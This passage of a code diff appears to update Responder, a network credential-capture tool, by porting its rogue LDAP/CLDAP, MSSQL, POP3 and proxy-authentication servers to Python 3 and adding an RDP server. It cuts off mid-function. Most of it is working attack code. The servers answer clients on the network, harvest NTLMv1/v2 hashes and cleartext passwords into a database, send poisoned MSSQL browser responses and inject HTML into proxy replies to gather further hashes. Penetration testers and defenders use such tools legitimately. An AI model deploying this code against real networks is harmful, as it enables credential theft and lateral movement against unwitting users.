+					'module': 'KERB',
+					'type': 'MSKerbv5',
+					'client': self.client_address[0],
+					'user': domain+'\\'+name,
+					'hash': h,
+					'fullhash': KerbHash,
+				})
+		except:
+			pass
--- a/servers/LDAP.py
+++ b/servers/LDAP.py
@@ -14,78 +14,150 @@
 #
 # You should have received a copy of the GNU General Public License
 # along with this program.  If not, see <http://www.gnu.org/licenses/>.
-from SocketServer import BaseRequestHandler
-from packets import LDAPSearchDefaultPacket, LDAPSearchSupportedCapabilitiesPacket, LDAPSearchSupportedMechanismsPacket, LDAPNTLMChallenge
+import sys
+if (sys.version_info > (3, 0)):
+	from socketserver import BaseRequestHandler
+else:
+	from SocketServer import BaseRequestHandler
+from packets import LDAPSearchDefaultPacket, LDAPSearchSupportedCapabilitiesPacket, LDAPSearchSupportedMechanismsPacket, LDAPNTLMChallenge, CLDAPNetlogon
 from utils import *
 import struct
+import codecs
+import random
+
+def CalculateDNSName(name):
+	if isinstance(name, bytes):
+		name = name.decode('latin-1')
+	name = name.split(".")
+	DomainPrefix = struct.pack('B', len(name[0])).decode('latin-1')+name[0]
+	Dnslen = ''
+	for x in name:
+		if len(x) >=1:
+			Dnslen += struct.pack('B', len(x)).decode('latin-1')+x
+
+	return Dnslen, DomainPrefix
+
+def ParseCLDAPNetlogon(data):
+	try:
+		Dns = data.find(b'DnsDomain')
+		if Dns == -1:
+			return False
+		DnsName = data[Dns+9:]
+		DnsGuidOff = data.find(b'DomainGuid')
+		if DnsGuidOff == -1:
+			return False
+		Guid = data[DnsGuidOff+10:]
+		if Dns:
+			DomainLen = struct.unpack(">B", DnsName[1:2])[0]
+			DomainName = DnsName[2:2+DomainLen]
+
+		if Guid:
+			DomainGuidLen = struct.unpack(">B", Guid[1:2])[0]
+			DomainGuid = Guid[2:2+DomainGuidLen]
+		return DomainName, DomainGuid
+	except:
+		pass
+

 def ParseSearch(data):
-	if re.search(r'(objectClass)', data):
-		return str(LDAPSearchDefaultPacket(MessageIDASNStr=data[8:9]))
-	elif re.search(r'(?i)(objectClass0*.*supportedCapabilities)', data):
-		return str(LDAPSearchSupportedCapabilitiesPacket(MessageIDASNStr=data[8:9],MessageIDASN2Str=data[8:9]))
-	elif re.search(r'(?i)(objectClass0*.*supportedSASLMechanisms)', data):
-		return str(LDAPSearchSupportedMechanismsPacket(MessageIDASNStr=data[8:9],MessageIDASN2Str=data[8:9]))
+	TID = data[8:9].decode('latin-1')
+	if re.search(b'Netlogon', data):
+		NbtName = settings.Config.MachineName
+		TID = NetworkRecvBufferPython2or3(data[8:10])
+		if TID[1] == "\x63":
+			TID = "\x00"+TID[0]
+		DomainName, DomainGuid = ParseCLDAPNetlogon(data)
+		DomainGuid = NetworkRecvBufferPython2or3(DomainGuid)
+		t = CLDAPNetlogon(MessageIDASNStr=TID ,CLDAPMessageIDStr=TID, NTLogonDomainGUID=DomainGuid, NTLogonForestName=CalculateDNSName(DomainName)[0],NTLogonPDCNBTName=CalculateDNSName(NbtName)[0], NTLogonDomainNBTName=CalculateDNSName(NbtName)[0],NTLogonDomainNameShort=CalculateDNSName(DomainName)[1])
+		t.calculate()
+		return str(t)

-def ParseLDAPHash(data, client):
-	SSPIStart = data[42:]
-	LMhashLen = struct.unpack('<H',data[54:56])[0]
+	if re.search(b'(?i)(objectClass0*.*supportedSASLMechanisms)', data):
+		return str(LDAPSearchSupportedMechanismsPacket(MessageIDASNStr=TID,MessageIDASN2Str=TID))

-	if LMhashLen > 10:
-		LMhashOffset = struct.unpack('<H',data[58:60])[0]
-		LMHash       = SSPIStart[LMhashOffset:LMhashOffset+LMhashLen].encode("hex").upper()
-		
-		NthashLen    = struct.unpack('<H',data[64:66])[0]
-		NthashOffset = struct.unpack('<H',data[66:68])[0]
-		NtHash       = SSPIStart[NthashOffset:NthashOffset+NthashLen].encode("hex").upper()
-		
-		DomainLen    = struct.unpack('<H',data[72:74])[0]
-		DomainOffset = struct.unpack('<H',data[74:76])[0]
-		Domain       = SSPIStart[DomainOffset:DomainOffset+DomainLen].replace('\x00','')
-		
-		UserLen      = struct.unpack('<H',data[80:82])[0]
-		UserOffset   = struct.unpack('<H',data[82:84])[0]
-		User         = SSPIStart[UserOffset:UserOffset+UserLen].replace('\x00','')
+	elif re.search(b'(?i)(objectClass0*.*supportedCapabilities)', data):
+		return str(LDAPSearchSupportedCapabilitiesPacket(MessageIDASNStr=TID,MessageIDASN2Str=TID))

-		WriteHash    = User + "::" + Domain + ":" + LMHash + ":" + NtHash + ":" + settings.Config.NumChal
+	elif re.search(b'(objectClass)', data):
+		return str(LDAPSearchDefaultPacket(MessageIDASNStr=TID))
+
+def ParseLDAPHash(data,client, Challenge):  #Parse LDAP NTLMSSP v1/v2
+	SSPIStart  = data.find(b'NTLMSSP')
+	SSPIString = data[SSPIStart:]
+	LMhashLen    = struct.unpack('<H',data[SSPIStart+14:SSPIStart+16])[0]
+	LMhashOffset = struct.unpack('<H',data[SSPIStart+16:SSPIStart+18])[0]
+	LMHash       = SSPIString[LMhashOffset:LMhashOffset+LMhashLen]
+	LMHash	     = codecs.encode(LMHash, 'hex').upper().decode('latin-1')
+	NthashLen    = struct.unpack('<H',data[SSPIStart+20:SSPIStart+22])[0]
+	NthashOffset = struct.unpack('<H',data[SSPIStart+24:SSPIStart+26])[0]
+
+	if NthashLen == 24:
+		SMBHash      = SSPIString[NthashOffset:NthashOffset+NthashLen]
+		SMBHash      = codecs.encode(SMBHash, 'hex').upper().decode('latin-1')
+		DomainLen    = struct.unpack('<H',SSPIString[30:32])[0]
+		DomainOffset = struct.unpack('<H',SSPIString[32:34])[0]
+		Domain       = SSPIString[DomainOffset:DomainOffset+DomainLen].decode('UTF-16LE')
+		UserLen      = struct.unpack('<H',SSPIString[38:40])[0]
+		UserOffset   = struct.unpack('<H',SSPIString[40:42])[0]
+		Username     = SSPIString[UserOffset:UserOffset+UserLen].decode('UTF-16LE')
+		WriteHash    = '%s::%s:%s:%s:%s' % (Username, Domain, LMHash, SMBHash, codecs.encode(Challenge,'hex').decode('latin-1'))

 		SaveToDb({
-			'module': 'LDAP',
-			'type': 'NTLMv1',
-			'client': client,
-			'user': Domain+'\\'+User,
-			'hash': NtHash,
+			'module': 'LDAP', 
+			'type': 'NTLMv1-SSP', 
+			'client': client, 
+			'user': Domain+'\\'+Username, 
+			'hash': SMBHash, 
+			'fullhash': WriteHash,
+		})
+
+	if NthashLen > 60:
+		SMBHash      = SSPIString[NthashOffset:NthashOffset+NthashLen]
+		SMBHash      = codecs.encode(SMBHash, 'hex').upper().decode('latin-1')
+		DomainLen    = struct.unpack('<H',SSPIString[30:32])[0]
+		DomainOffset = struct.unpack('<H',SSPIString[32:34])[0]
+		Domain       = SSPIString[DomainOffset:DomainOffset+DomainLen].decode('UTF-16LE')
+		UserLen      = struct.unpack('<H',SSPIString[38:40])[0]
+		UserOffset   = struct.unpack('<H',SSPIString[40:42])[0]
+		Username     = SSPIString[UserOffset:UserOffset+UserLen].decode('UTF-16LE')
+		WriteHash    = '%s::%s:%s:%s:%s' % (Username, Domain, codecs.encode(Challenge,'hex').decode('latin-1'), SMBHash[:32], SMBHash[32:])
+
+		SaveToDb({
+			'module': 'LDAP', 
+			'type': 'NTLMv2-SSP', 
+			'client': client, 
+			'user': Domain+'\\'+Username, 
+			'hash': SMBHash, 
 			'fullhash': WriteHash,
 		})
-	
 	if LMhashLen < 2 and settings.Config.Verbose:
-		print text("[LDAP] Ignoring anonymous NTLM authentication")
+		print(text("[LDAP] Ignoring anonymous NTLM authentication"))

-def ParseNTLM(data,client):
-	if re.search('(NTLMSSP\x00\x01\x00\x00\x00)', data):
-		NTLMChall = LDAPNTLMChallenge(MessageIDASNStr=data[8:9],NTLMSSPNtServerChallenge=settings.Config.Challenge)
+def ParseNTLM(data,client, Challenge):
+	if re.search(b'(NTLMSSP\x00\x01\x00\x00\x00)', data):
+		NTLMChall = LDAPNTLMChallenge(MessageIDASNStr=data[8:9].decode('latin-1'),NTLMSSPNtServerChallenge=NetworkRecvBufferPython2or3(Challenge))
 		NTLMChall.calculate()
-		return str(NTLMChall)
-	elif re.search('(NTLMSSP\x00\x03\x00\x00\x00)', data):
-		ParseLDAPHash(data,client)
+		return NTLMChall
+	elif re.search(b'(NTLMSSP\x00\x03\x00\x00\x00)', data):
+		ParseLDAPHash(data, client, Challenge)

-def ParseLDAPPacket(data, client):
-	if data[1:2] == '\x84':
+def ParseCLDAPPacket(data, client, Challenge):
+	if data[1:2] == b'\x84':
+		Operation        = data[10:11]
 		PacketLen        = struct.unpack('>i',data[2:6])[0]
-		MessageSequence  = struct.unpack('<b',data[8:9])[0]
-		Operation        = data[9:10]
+		if Operation == b'\x84':
+			Operation = data[9:10]
 		sasl             = data[20:21]
 		OperationHeadLen = struct.unpack('>i',data[11:15])[0]
 		LDAPVersion      = struct.unpack('<b',data[17:18])[0]
-		
-		if Operation == "\x60":
+		if Operation == b'\x60':
 			UserDomainLen  = struct.unpack('<b',data[19:20])[0]
-			UserDomain     = data[20:20+UserDomainLen]
+			UserDomain     = data[20:20+UserDomainLen].decode('latin-1')
 			AuthHeaderType = data[20+UserDomainLen:20+UserDomainLen+1]

-			if AuthHeaderType == "\x80":
+			if AuthHeaderType == b'\x80':
 				PassLen   = struct.unpack('<b',data[20+UserDomainLen+1:20+UserDomainLen+2])[0]
-				Password  = data[20+UserDomainLen+2:20+UserDomainLen+2+PassLen]
+				Password  = data[20+UserDomainLen+2:20+UserDomainLen+2+PassLen].decode('latin-1')
 				SaveToDb({
 					'module': 'LDAP',
 					'type': 'Cleartext',
@@ -95,25 +167,112 @@ def ParseLDAPPacket(data, client):
 					'fullhash': UserDomain+':'+Password,
 				})
 			
-			if sasl == "\xA3":
-				Buffer = ParseNTLM(data,client)
+			if sasl == b'\xA3':
+				Buffer = ParseNTLM(data,client, Challenge)
 				return Buffer
 		
-		elif Operation == "\x63":
+		elif Operation == b'\x63':
+			Buffer = ParseSearch(data)
+			print(text('[CLDAP] Sent CLDAP pong to %s.'% client))
+			return Buffer
+
+		elif settings.Config.Verbose:
+			print(text('[CLDAP] Operation not supported'))
+
+	if data[5:6] == b'\x60':
+		UserLen = struct.unpack("<b",data[11:12])[0]
+		UserString = data[12:12+UserLen].decode('latin-1')
+		PassLen = struct.unpack("<b",data[12+UserLen+1:12+UserLen+2])[0]
+		PassStr = data[12+UserLen+2:12+UserLen+3+PassLen].decode('latin-1')
+		if settings.Config.Verbose:
+			print(text('[CLDAP] Attempting to parse an old simple Bind request.'))
+		SaveToDb({
+			'module': 'LDAP',
+			'type': 'Cleartext',
+			'client': client,
+			'user': UserString,
+			'cleartext': PassStr,
+			'fullhash': UserString+':'+PassStr,
+			})
+
+
+def ParseLDAPPacket(data, client, Challenge):
+	if data[1:2] == b'\x84':
+		PacketLen        = struct.unpack('>i',data[2:6])[0]
+		MessageSequence  = struct.unpack('<b',data[8:9])[0]
+		Operation        = data[9:10]
+		sasl             = data[20:21]
+		OperationHeadLen = struct.unpack('>i',data[11:15])[0]
+		LDAPVersion      = struct.unpack('<b',data[17:18])[0]
+		if Operation == b'\x60':#Bind
+			UserDomainLen  = struct.unpack('<b',data[19:20])[0]
+			UserDomain     = data[20:20+UserDomainLen].decode('latin-1')
+			AuthHeaderType = data[20+UserDomainLen:20+UserDomainLen+1]
+
+			if AuthHeaderType == b'\x80':
+				PassLen   = struct.unpack('<b',data[20+UserDomainLen+1:20+UserDomainLen+2])[0]
+				Password  = data[20+UserDomainLen+2:20+UserDomainLen+2+PassLen].decode('latin-1')
+				SaveToDb({
+					'module': 'LDAP',
+					'type': 'Cleartext',
+					'client': client,
+					'user': UserDomain,
+					'cleartext': Password,
+					'fullhash': UserDomain+':'+Password,
+				})
+			
+			if sasl == b'\xA3':
+				Buffer = ParseNTLM(data,client, Challenge)
+				return Buffer
+		
+		elif Operation == b'\x63':
 			Buffer = ParseSearch(data)
 			return Buffer
+
 		elif settings.Config.Verbose:
-			print text('[LDAP] Operation not supported')
+			print(text('[LDAP] Operation not supported'))
+
+	if data[5:6] == b'\x60':
+		UserLen = struct.unpack("<b",data[11:12])[0]
+		UserString = data[12:12+UserLen].decode('latin-1')
+		PassLen = struct.unpack("<b",data[12+UserLen+1:12+UserLen+2])[0]
+		PassStr = data[12+UserLen+2:12+UserLen+3+PassLen].decode('latin-1')
+		if settings.Config.Verbose:
+			print(text('[LDAP] Attempting to parse an old simple Bind request.'))
+		SaveToDb({
+			'module': 'LDAP',
+			'type': 'Cleartext',
+			'client': client,
+			'user': UserString,
+			'cleartext': PassStr,
+			'fullhash': UserString+':'+PassStr,
+			})

 class LDAP(BaseRequestHandler):
 	def handle(self):
 		try:
-			while True:
-				self.request.settimeout(0.5)
-				data = self.request.recv(8092)
-				Buffer = ParseLDAPPacket(data,self.client_address[0])
-
+			self.request.settimeout(1)
+			data = self.request.recv(8092)
+			Challenge = RandomChallenge()
+			for x in range(5):
+				Buffer = ParseLDAPPacket(data,self.client_address[0], Challenge)
 				if Buffer:
-					self.request.send(Buffer)
-		except socket.timeout:
+					self.request.send(NetworkSendBufferPython2or3(Buffer))
+				data = self.request.recv(8092)
+		except:
 			pass
+
+
+class CLDAP(BaseRequestHandler):
+	def handle(self):
+		try:
+			data, soc = self.request
+			Challenge = RandomChallenge()
+			for x in range(1):
+				Buffer = ParseCLDAPPacket(data,self.client_address[0], Challenge)
+				if Buffer:
+					soc.sendto(NetworkSendBufferPython2or3(Buffer), self.client_address)
+				data, soc = self.request
+		except:
+			pass
+
--- a/servers/MSSQL.py
+++ b/servers/MSSQL.py
@@ -14,10 +14,16 @@
 #
 # You should have received a copy of the GNU General Public License
 # along with this program.  If not, see <http://www.gnu.org/licenses/>.
-from SocketServer import BaseRequestHandler
-from packets import MSSQLPreLoginAnswer, MSSQLNTLMChallengeAnswer
-from utils import *
+import random
 import struct
+import codecs
+from utils import *
+if settings.Config.PY2OR3 == "PY3":
+	from socketserver import BaseRequestHandler
+else:
+	from SocketServer import BaseRequestHandler
+from packets import MSSQLPreLoginAnswer, MSSQLNTLMChallengeAnswer
+

 class TDS_Login_Packet:
 	def __init__(self, data):
@@ -40,7 +46,7 @@ class TDS_Login_Packet:
 		LocaleLen         = struct.unpack('<h', data[74:76])[0]
 		DatabaseNameOff   = struct.unpack('<h', data[76:78])[0]
 		DatabaseNameLen   = struct.unpack('<h', data[78:80])[0]
-
+		data = NetworkRecvBufferPython2or3(data)
 		self.ClientName   = data[8+ClientNameOff:8+ClientNameOff+ClientNameLen*2].replace('\x00', '')
 		self.UserName     = data[8+UserNameOff:8+UserNameOff+UserNameLen*2].replace('\x00', '')
 		self.Password     = data[8+PasswordOff:8+PasswordOff+PasswordLen*2].replace('\x00', '')
@@ -51,28 +57,26 @@ class TDS_Login_Packet:
 		self.Locale       = data[8+LocaleOff:8+LocaleOff+LocaleLen*2].replace('\x00', '')
 		self.DatabaseName = data[8+DatabaseNameOff:8+DatabaseNameOff+DatabaseNameLen*2].replace('\x00', '')

-
-def ParseSQLHash(data, client):
+def ParseSQLHash(data, client, Challenge):
 	SSPIStart     = data[8:]
-
 	LMhashLen     = struct.unpack('<H',data[20:22])[0]
 	LMhashOffset  = struct.unpack('<H',data[24:26])[0]
-	LMHash        = SSPIStart[LMhashOffset:LMhashOffset+LMhashLen].encode("hex").upper()
-	
+	LMHash        = SSPIStart[LMhashOffset:LMhashOffset+LMhashLen]
+	LMHash        = codecs.encode(LMHash, 'hex').upper().decode('latin-1')
 	NthashLen     = struct.unpack('<H',data[30:32])[0]
 	NthashOffset  = struct.unpack('<H',data[32:34])[0]
-	NTHash        = SSPIStart[NthashOffset:NthashOffset+NthashLen].encode("hex").upper()
-	
+	NTHash        = SSPIStart[NthashOffset:NthashOffset+NthashLen]
+	NTHash        = codecs.encode(NTHash, 'hex').upper().decode('latin-1')
 	DomainLen     = struct.unpack('<H',data[36:38])[0]
 	DomainOffset  = struct.unpack('<H',data[40:42])[0]
-	Domain        = SSPIStart[DomainOffset:DomainOffset+DomainLen].replace('\x00','')
+	Domain        = SSPIStart[DomainOffset:DomainOffset+DomainLen].decode('UTF-16LE')
 	
 	UserLen       = struct.unpack('<H',data[44:46])[0]
 	UserOffset    = struct.unpack('<H',data[48:50])[0]
-	User          = SSPIStart[UserOffset:UserOffset+UserLen].replace('\x00','')
+	User          = SSPIStart[UserOffset:UserOffset+UserLen].decode('UTF-16LE')

 	if NthashLen == 24:
-		WriteHash = '%s::%s:%s:%s:%s' % (User, Domain, LMHash, NTHash, settings.Config.NumChal)
+		WriteHash = '%s::%s:%s:%s:%s' % (User, Domain, LMHash, NTHash, codecs.encode(Challenge,'hex').decode('latin-1'))

 		SaveToDb({
 			'module': 'MSSQL', 
@@ -84,7 +88,7 @@ def ParseSQLHash(data, client):
 		})

 	if NthashLen > 60:
-		WriteHash = '%s::%s:%s:%s:%s' % (User, Domain, settings.Config.NumChal, NTHash[:32], NTHash[32:])
+		WriteHash = '%s::%s:%s:%s:%s' % (User, Domain, codecs.encode(Challenge,'hex').decode('latin-1'), NTHash[:32], NTHash[32:])
 		
 		SaveToDb({
 			'module': 'MSSQL', 
@@ -98,10 +102,10 @@ def ParseSQLHash(data, client):

 def ParseSqlClearTxtPwd(Pwd):
 	Pwd = map(ord,Pwd.replace('\xa5',''))
-	Pw = ''
+	Pw = b''
 	for x in Pwd:
-		Pw += hex(x ^ 0xa5)[::-1][:2].replace("x", "0").decode('hex')
-	return Pw
+		Pw += codecs.decode(hex(x ^ 0xa5)[::-1][:2].replace("x", "0"), 'hex')
+	return Pw.decode('latin-1')


 def ParseClearTextSQLPass(data, client):
@@ -119,32 +123,64 @@ def ParseClearTextSQLPass(data, client):
 # MSSQL Server class
 class MSSQL(BaseRequestHandler):
 	def handle(self):
-		if settings.Config.Verbose:
-			print text("[MSSQL] Received connection from %s" % self.client_address[0])
 	
 		try:
+			self.ntry = 0
 			while True:
 				data = self.request.recv(1024)
-				self.request.settimeout(0.1)
+				self.request.settimeout(1)
+				Challenge = RandomChallenge()

-
-				if data[0] == "\x12":  # Pre-Login Message
+				if not data:
+					break
+				if settings.Config.Verbose:
+					print(text("[MSSQL] Received connection from %s" % self.client_address[0]))
+				if data[0] == b"\x12" or data[0] == 18:  # Pre-Login Message
 					Buffer = str(MSSQLPreLoginAnswer())
-					self.request.send(Buffer)
+					self.request.send(NetworkSendBufferPython2or3(Buffer))
 					data = self.request.recv(1024)

-				if data[0] == "\x10":  # NegoSSP
-					if re.search("NTLMSSP",data):
-						Packet = MSSQLNTLMChallengeAnswer(ServerChallenge=settings.Config.Challenge)
+				if data[0] == b"\x10" or data[0] == 16:  # NegoSSP
+					if re.search(b'NTLMSSP',data):
+						Packet = MSSQLNTLMChallengeAnswer(ServerChallenge=NetworkRecvBufferPython2or3(Challenge))
 						Packet.calculate()
 						Buffer = str(Packet)
-						self.request.send(Buffer)
+						self.request.send(NetworkSendBufferPython2or3(Buffer))
 						data = self.request.recv(1024)
 					else:
 						ParseClearTextSQLPass(data,self.client_address[0])

-				if data[0] == "\x11":  # NegoSSP Auth
-					ParseSQLHash(data,self.client_address[0])
+				if data[0] == b'\x11' or data[0] == 17:  # NegoSSP Auth
+					ParseSQLHash(data,self.client_address[0],Challenge)

-		except socket.timeout:
-			self.request.close()
+		except:
+			pass
+
+# MSSQL Server Browser class
+# See "[MC-SQLR]: SQL Server Resolution Protocol": https://msdn.microsoft.com/en-us/library/cc219703.aspx
+class MSSQLBrowser(BaseRequestHandler):
+	def handle(self):
+		if settings.Config.Verbose:
+			print(text("[MSSQL-BROWSER] Received request from %s" % self.client_address[0]))
+
+		data, soc = self.request
+
+		if data:
+			if data[0] in b'\x02\x03': # CLNT_BCAST_EX / CLNT_UCAST_EX
+				self.send_response(soc, "MSSQLSERVER")
+			elif data[0] == b'\x04': # CLNT_UCAST_INST
+				self.send_response(soc, data[1:].rstrip("\x00"))
+			elif data[0] == b'\x0F': # CLNT_UCAST_DAC
+				self.send_dac_response(soc)
+
+	def send_response(self, soc, inst):
+		print(text("[MSSQL-BROWSER] Sending poisoned response to %s" % self.client_address[0]))
+
+		server_name = ''.join(chr(random.randint(ord('A'), ord('Z'))) for _ in range(random.randint(12, 20)))
+		resp = "ServerName;%s;InstanceName;%s;IsClustered;No;Version;12.00.4100.00;tcp;1433;;" % (server_name, inst)
+		soc.sendto(struct.pack("<BH", 0x05, len(resp)) + NetworkSendBufferPython2or3(resp), self.client_address)
+
+	def send_dac_response(self, soc):
+		print(text("[MSSQL-BROWSER] Sending poisoned DAC response to %s" % self.client_address[0]))
+
+		soc.sendto(NetworkSendBufferPython2or3(struct.pack("<BHBH", 0x05, 0x06, 0x01, 1433)), self.client_address)
--- a/servers/POP3.py
+++ b/servers/POP3.py
@@ -15,25 +15,33 @@
 # You should have received a copy of the GNU General Public License
 # along with this program.  If not, see <http://www.gnu.org/licenses/>.
 from utils import *
-from SocketServer import BaseRequestHandler
-from packets import POPOKPacket
+if settings.Config.PY2OR3 == "PY3":
+	from socketserver import BaseRequestHandler
+else:
+	from SocketServer import BaseRequestHandler
+from packets import POPOKPacket,POPNotOKPacket

 # POP3 Server class
 class POP3(BaseRequestHandler):
 	def SendPacketAndRead(self):
 		Packet = POPOKPacket()
-		self.request.send(str(Packet))
+		self.request.send(NetworkSendBufferPython2or3(Packet))
 		return self.request.recv(1024)

 	def handle(self):
 		try:
 			data = self.SendPacketAndRead()
-
-			if data[0:4] == "USER":
-				User = data[5:].replace("\r\n","")
+			if data[0:4] == b'CAPA':
+				self.request.send(NetworkSendBufferPython2or3(POPNotOKPacket()))
+				data = self.request.recv(1024)
+			if data[0:4] == b'AUTH':
+				self.request.send(NetworkSendBufferPython2or3(POPNotOKPacket()))
+				data = self.request.recv(1024)
+			if data[0:4] == b'USER':
+				User = data[5:].strip(b"\r\n").decode("latin-1")
 				data = self.SendPacketAndRead()
-			if data[0:4] == "PASS":
-				Pass = data[5:].replace("\r\n","")
+			if data[0:4] == b'PASS':
+				Pass = data[5:].strip(b"\r\n").decode("latin-1")

 				SaveToDb({
 					'module': 'POP3', 
--- a/servers/Proxy_Auth.py
+++ b/servers/Proxy_Auth.py
@@ -14,10 +14,18 @@
 #
 # You should have received a copy of the GNU General Public License
 # along with this program.  If not, see <http://www.gnu.org/licenses/>.
-import SocketServer
-from HTTP import ParseHTTPHash
-from packets import *
 from utils import *
+if settings.Config.PY2OR3 == "PY3":
+	from socketserver import BaseRequestHandler, StreamRequestHandler
+else:
+	from SocketServer import BaseRequestHandler, StreamRequestHandler
+from servers.HTTP import ParseHTTPHash
+from packets import *
+
+def GrabUserAgent(data):
+	UserAgent = re.findall(r'(?<=User-Agent: )[^\r]*', data)
+	if UserAgent:
+		print(text("[Proxy-Auth] %s" % color("User-Agent        : "+UserAgent[0], 2)))

 def GrabCookie(data):
 	Cookie = re.search(r'(Cookie:*.\=*)[^\r\n]*', data)
@@ -25,8 +33,8 @@ def GrabCookie(data):
 	if Cookie:
 		Cookie = Cookie.group(0).replace('Cookie: ', '')
 		if len(Cookie) > 1:
-                        if settings.Config.Verbose:
-			        print text("[Proxy-Auth] %s" % color("Cookie           : "+Cookie, 2))
+			if settings.Config.Verbose:
+				print(text("[Proxy-Auth] %s" % color("Cookie           : "+Cookie, 2)))

 		return Cookie
 	return False
@@ -36,45 +44,48 @@ def GrabHost(data):

 	if Host:
 		Host = Host.group(0).replace('Host: ', '')
-                if settings.Config.Verbose:
-		        print text("[Proxy-Auth] %s" % color("Host             : "+Host, 2))
+		if settings.Config.Verbose:
+			print(text("[Proxy-Auth] %s" % color("Host             : "+Host, 2)))

 		return Host
 	return False

-def PacketSequence(data, client):
+def PacketSequence(data, client, Challenge):
 	NTLM_Auth = re.findall(r'(?<=Authorization: NTLM )[^\r]*', data)
 	Basic_Auth = re.findall(r'(?<=Authorization: Basic )[^\r]*', data)	
 	if NTLM_Auth:
 		Packet_NTLM = b64decode(''.join(NTLM_Auth))[8:9]
-		if Packet_NTLM == "\x01":
+		if Packet_NTLM == b'\x01':
 			if settings.Config.Verbose:
-				print text("[Proxy-Auth] Sending NTLM authentication request to %s" % client)
-
-			Buffer = NTLM_Challenge(ServerChallenge=settings.Config.Challenge)
+				print(text("[Proxy-Auth] Sending NTLM authentication request to %s" % client))
+			Buffer = NTLM_Challenge(ServerChallenge=NetworkRecvBufferPython2or3(Challenge))
 			Buffer.calculate()
-			Buffer_Ans = WPAD_NTLM_Challenge_Ans()
-			Buffer_Ans.calculate(str(Buffer))
-			return str(Buffer_Ans)
-		if Packet_NTLM == "\x03":
+			Buffer_Ans =  WPAD_NTLM_Challenge_Ans(Payload = b64encode(NetworkSendBufferPython2or3(Buffer)).decode('latin-1'))
+			return Buffer_Ans
+
+		if Packet_NTLM == b'\x03':
 			NTLM_Auth = b64decode(''.join(NTLM_Auth))
-       	                ParseHTTPHash(NTLM_Auth, client, "Proxy-Auth")
-                        GrabCookie(data)
-                        GrabHost(data)
-   	                return False
+			ParseHTTPHash(NTLM_Auth, Challenge, client, "Proxy-Auth")
+			GrabUserAgent(data)
+			GrabCookie(data)
+			GrabHost(data)
+			Buffer = IIS_Auth_Granted(Payload=settings.Config.HtmlToInject) #While at it, grab some SMB hashes...
+			Buffer.calculate()
+			return Buffer
 		else:
-               		return False
+               		return IIS_Auth_Granted(Payload=settings.Config.HtmlToInject)# Didn't work? no worry, let's grab hashes via SMB...

 	elif Basic_Auth:
-                GrabCookie(data)
-                GrabHost(data)
-		ClearText_Auth = b64decode(''.join(Basic_Auth))
+		GrabUserAgent(data)
+		GrabCookie(data)
+		GrabHost(data)
+		ClearText_Auth = b64decode(''.join(Basic_Auth).encode('latin-1'))
 		SaveToDb({
 			'module': 'Proxy-Auth', 
 			'type': 'Basic', 
 			'client': client, 
-			'user': ClearText_Auth.split(':')[0], 
-			'cleartext': ClearText_Auth.split(':')[1], 
+			'user': ClearText_Auth.decode('latin-1').split(':')[0], 
+			'cleartext': ClearText_Auth.decode('latin-1').split(':')[1], 
 			})

 		return False
@@ -82,27 +93,51 @@ def PacketSequence(data, client):
 		if settings.Config.Basic:
 			Response = WPAD_Basic_407_Ans()
 			if settings.Config.Verbose:
-				print text("[Proxy-Auth] Sending BASIC authentication request to %s" % client)
+				print(text("[Proxy-Auth] Sending BASIC authentication request to %s" % client))

 		else:
 			Response = WPAD_Auth_407_Ans()

 		return str(Response)

-class Proxy_Auth(SocketServer.BaseRequestHandler):
-     
-    def server_bind(self):
-       self.socket.setsockopt(SOL_SOCKET, SO_REUSEADDR,SO_REUSEPORT, 1)
-       self.socket.bind(self.server_address)
-       self.socket.setblocking(0)
-       self.socket.setdefaulttimeout(1)
+class Proxy_Auth(BaseRequestHandler):

-    def handle(self):
+	def handle(self):
 		try:
-                    for x in range(2):
-                        data = self.request.recv(4096)
-                        self.request.send(PacketSequence(data, self.client_address[0]))
+			Challenge = RandomChallenge()
+			while True:
+				self.request.settimeout(3)
+				remaining = 10*1024*1024 #setting max recieve size
+				data = ''
+				while True:
+					buff = ''
+					buff = NetworkRecvBufferPython2or3(self.request.recv(8092))
+					if buff == '':
+						break
+					data += buff
+					remaining -= len(buff)
+					#check if we recieved the full header
+					if data.find('\r\n\r\n') != -1: 
+						#we did, now to check if there was anything else in the request besides the header
+						if data.find('Content-Length') == -1:
+							#request contains only header
+							break
+						else:
+							#searching for that content-length field in the header
+							for line in data.split('\r\n'):
+								if line.find('Content-Length') != -1:
+									line = line.strip()
+									remaining = int(line.split(':')[1].strip()) - len(data)
+					if remaining <= 0:
+						break
+				if data == "":
+					break
+
+				else:
+					Buffer = PacketSequence(data,self.client_address[0], Challenge)
+					self.request.send(NetworkSendBufferPython2or3(Buffer))

 		except:
-                   	pass
+			pass
+

--- a/servers/RDP.py
+++ b/servers/RDP.py
@@ -0,0 +1,142 @@
+#!/usr/bin/env python
+# This file is part of Responder, a network take-over set of tools 
+# created and maintained by Laurent Gaffie.
+# email: laurent.gaffie@gmail.com
+# This program is free software: you can redistribute it and/or modify
+# it under the terms of the GNU General Public License as published by
+# the Free Software Foundation, either version 3 of the License, or
+# (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program.  If not, see <http://www.gnu.org/licenses/>.
+from utils import *
+import struct
+import re
+import ssl
+import codecs
+if settings.Config.PY2OR3 == "PY3":
+	from socketserver import BaseRequestHandler
+else:
+	from SocketServer import BaseRequestHandler
+
+from packets import TPKT, X224, RDPNEGOAnswer, RDPNTLMChallengeAnswer
+
+cert = os.path.join(settings.Config.ResponderPATH, settings.Config.SSLCert)
+key =  os.path.join(settings.Config.ResponderPATH, settings.Config.SSLKey)
+
+def ParseNTLMHash(data,client, Challenge):  #Parse NTLMSSP v1/v2
+	SSPIStart  = data.find(b'NTLMSSP')
+	SSPIString = data[SSPIStart:]
+	LMhashLen    = struct.unpack('<H',data[SSPIStart+14:SSPIStart+16])[0]
+	LMhashOffset = struct.unpack('<H',data[SSPIStart+16:SSPIStart+18])[0]
+	LMHash       = SSPIString[LMhashOffset:LMhashOffset+LMhashLen]
+	LMHash	     = codecs.encode(LMHash, 'hex').upper().decode('latin-1')
+	NthashLen    = struct.unpack('<H',data[SSPIStart+20:SSPIStart+22])[0]
+	NthashOffset = struct.unpack('<H',data[SSPIStart+24:SSPIStart+26])[0]
+
+	if NthashLen == 24:
+		SMBHash      = SSPIString[NthashOffset:NthashOffset+NthashLen]
+		SMBHash      = codecs.encode(SMBHash, 'hex').upper().decode('latin-1')
